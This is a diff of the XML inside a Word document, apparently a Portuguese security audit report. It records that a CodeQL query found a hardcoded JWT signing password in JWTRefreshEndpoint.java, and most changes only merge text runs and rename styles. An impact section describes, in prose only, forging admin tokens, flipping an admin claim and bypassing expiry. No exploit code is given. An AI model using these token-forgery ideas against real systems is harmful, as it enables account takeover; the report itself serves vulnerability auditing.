+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>análise técnica</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>A query HardcodedPasswordField.ql identificou uma entrada no ficheiro JWTRefreshEndpoint.java que contém uma password usada para assinar/verificar tokens JWT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PostHeadPara"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>screenshot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do resultado da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>HardcodedPasswordField.ql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mostrando a entrada JWTRefreshEndpoint.java</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Os ficheiros de apoio que preparaste (4b.txt, 4c.txt) descrevem a estrutura do JWT, o uso da password no código e os riscos associados.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5052,7 +3062,6 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -5063,190 +3072,6 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Resultados: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>hardcoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>credential</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (JWT) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>análise técnica</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PostHeadPara"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>HardcodedPasswordField.ql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> identificou uma entrada no ficheiro JWTRefreshEndpoint.java que contém uma password usada para assinar/verificar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>tokens</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JWT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PostHeadPara"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Os ficheiros de apoio que preparaste (4b.txt, 4c.txt) descrevem a estrutura do JWT, o uso da password no código e os riscos associados.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t>Impacto prático (o que um atacante pode fazer)</w:t>
       </w:r>
     </w:p>
@@ -5262,21 +3087,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Com a chave JWT_PASSWORD exposta (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>hardcoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>) um atacante consegue:</w:t>
+        <w:t>Com a chave JWT_PASSWORD exposta (hardcoded) um atacante consegue:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5296,45 +3107,13 @@
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Forjar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>tokens</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JWT válidos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para qualquer utilizador (incluindo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>), falsificando identidade.</w:t>
+        <w:t>Forjar tokens JWT válidos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para qualquer utilizador (incluindo admin), falsificando identidade.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5360,23 +3139,8 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">: modificar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>claims</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (ex.: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">: modificar claims (ex.: </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -5384,7 +3148,6 @@
         </w:rPr>
         <w:t>admin:false</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -5392,7 +3155,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> → </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -5400,7 +3162,6 @@
         </w:rPr>
         <w:t>admin:true</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -5432,35 +3193,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">: criar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>tokens</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> com datas arbitrárias, contornando mecanismos de expiração/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>refresh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>: criar tokens com datas arbitrárias, contornando mecanismos de expiração/refresh.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5488,61 +3221,13 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">excerto de código do JWTRefreshEndpoint.java que a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sinalizou. Se não tens o ficheiro fonte no relatório, faz uma captura do resultado da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no VS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e insere como figura.</w:t>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>excerto de código do JWTRefreshEndpoint.java que a query sinalizou. Se não tens o ficheiro fonte no relatório, faz uma captura do resultado da query no VS Code e insere como figura.</w:t>
       </w:r>
       <w:bookmarkStart w:id="1" w:name="sbmn"/>
       <w:bookmarkEnd w:id="1"/>
@@ -5564,8 +3249,8 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId7"/>
-      <w:footerReference w:type="first" r:id="rId8"/>
+      <w:footerReference w:type="default" r:id="rId13"/>
+      <w:footerReference w:type="first" r:id="rId14"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1760" w:right="2040" w:bottom="2840" w:left="1440" w:header="706" w:footer="706" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -5605,7 +3290,7 @@
 <w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:r>
@@ -5637,87 +3322,87 @@
 <w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
   <w:p>
     <w:pPr>
-      <w:pStyle w:val="Rodap"/>
+      <w:pStyle w:val="Footer"/>
     </w:pPr>
   </w:p>
 </w:ftr>
@@ -6006,7 +3691,7 @@
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:pStyle w:val="PargrafodaLista"/>
+      <w:pStyle w:val="ListParagraph"/>
       <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
@@ -8031,11 +5716,11 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Ttulo1">
+  <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
-    <w:link w:val="Ttulo1Carter"/>
+    <w:link w:val="Heading1Char"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="005B434B"/>
@@ -8052,11 +5737,11 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Ttulo2">
+  <w:style w:type="paragraph" w:styleId="Heading2">
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
-    <w:link w:val="Ttulo2Carter"/>
+    <w:link w:val="Heading2Char"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -8075,11 +5760,11 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Ttulo3">
+  <w:style w:type="paragraph" w:styleId="Heading3">
     <w:name w:val="heading 3"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
-    <w:link w:val="Ttulo3Carter"/>
+    <w:link w:val="Heading3Char"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -8098,12 +5783,13 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="Tipodeletrapredefinidodopargrafo">
+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="Tabelanormal">
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -8118,7 +5804,7 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="Semlista">
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
     <w:name w:val="No List"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -8166,7 +5852,7 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="PargrafodaLista">
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
     <w:name w:val="List Paragraph"/>
     <w:qFormat/>
     <w:rsid w:val="005B434B"/>
@@ -8190,7 +5876,7 @@
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Head1">
     <w:name w:val="Head1"/>
-    <w:basedOn w:val="Ttulo1"/>
+    <w:basedOn w:val="Heading1"/>
     <w:next w:val="Para"/>
     <w:qFormat/>
     <w:rsid w:val="005B434B"/>
@@ -8215,7 +5901,7 @@
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Head2">
     <w:name w:val="Head2"/>
-    <w:basedOn w:val="Ttulo2"/>
+    <w:basedOn w:val="Heading2"/>
     <w:next w:val="Para"/>
     <w:qFormat/>
     <w:rsid w:val="005B434B"/>
@@ -8270,7 +5956,7 @@
       <w:lang w:eastAsia="ja-JP"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Hiperligao">
+  <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
@@ -8279,11 +5965,11 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Subttulo">
+  <w:style w:type="paragraph" w:styleId="Subtitle">
     <w:name w:val="Subtitle"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
-    <w:link w:val="SubttuloCarter"/>
+    <w:link w:val="SubtitleChar"/>
     <w:qFormat/>
     <w:rsid w:val="005B434B"/>
     <w:pPr>
@@ -8296,10 +5982,10 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="SubttuloCarter">
-    <w:name w:val="Subtítulo Caráter"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
-    <w:link w:val="Subttulo"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
+    <w:name w:val="Subtitle Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Subtitle"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
       <w:rFonts w:ascii="Linux Biolinum O" w:eastAsia="MS Gothic" w:hAnsi="Linux Biolinum O" w:cs="Linux Biolinum O"/>
@@ -8363,7 +6049,7 @@
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="TitledocumentChar">
     <w:name w:val="Title_document Char"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Titledocument"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
